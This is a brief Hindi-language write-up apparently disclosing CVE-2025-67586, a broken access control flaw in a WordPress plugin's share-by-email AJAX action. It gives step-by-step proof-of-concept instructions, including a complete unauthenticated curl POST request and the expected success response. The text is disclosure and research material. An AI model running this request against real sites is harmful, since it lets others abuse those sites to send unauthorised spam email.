
writeups for (CVE-2025-67586, CVE-2025-67985, CVE-2025-67986)
लिखित विवरण (CVE-2025-67586, CVE-2025-67985, CVE-2025-67986) के लिए
-------------- CVE-2025-67586 शोषण PoC --------------
==> विवरण DLX प्लगइन्स द्वारा विकसित वर्डप्रेस प्लगइन में एक टूटा एक्सेस नियंत्रण भेद्यता मौजूद है। प्लगइन एक अप्रमाणित AJAX क्रिया को उजागर करता है जो हमलावरों को अनुमति देता है "ईमेल द्वारा साझा करें" कार्यक्षमता का उचित अनुमति जांच के बिना दुरुपयोग करने की।
एक अप्रमाणित हमलावर ईमेल साझाकरण अनुरोधों को ट्रिगर करने के लिए एक वैध पोस्ट नॉन्स का पुन: उपयोग कर सकता है, जिससे उपयोगकर्ता प्रमाणीकरण के बिना अनधिकृत ईमेल भेजना (ईमेल स्पैम / दुरुपयोग) हो सकता है।
==> आवश्यक विशेषाधिकार कोई नहीं (अप्रमाणित)
==> अवधारणा का प्रमाण (PoC)
चरण 1: स्थापित प्लगइन वाली वेबसाइट चुनें
चरण 2: एक वैध नॉन्स प्राप्त करें
चरण 3: अप्रमाणित अनुरोध के माध्यम से शोषण करें
bash cmd: (वेबसाइट URL, पोस्ट URL और नॉन्स बदलें)
curl -s -i -X POST 'http://localhost/wp-admin/admin-ajax.php'
-d 'action=has_email_form_submission'
-d 'formData[postId]='
-d 'formData[permalink]=http://localhost/?p='
-d 'formData[nonce]='
-d 'formData[toEmail]=[email protected]'
-d 'formData[subject]=PoC'
-d 'formData[shareText]=POC test'
-d 'formData[emailShareType]=selection'
--compressed
--> अपेक्षित JSON प्रतिक्रिया:
{ "success": true, "data": { "errors": false, "message_title": "This post has been shared!", "message_body": "You have shared this post with [email protected]", "message_subject": "[Shared Post] ", "message_source_name": "Site Name", "message_source_email": "[email protected]" } }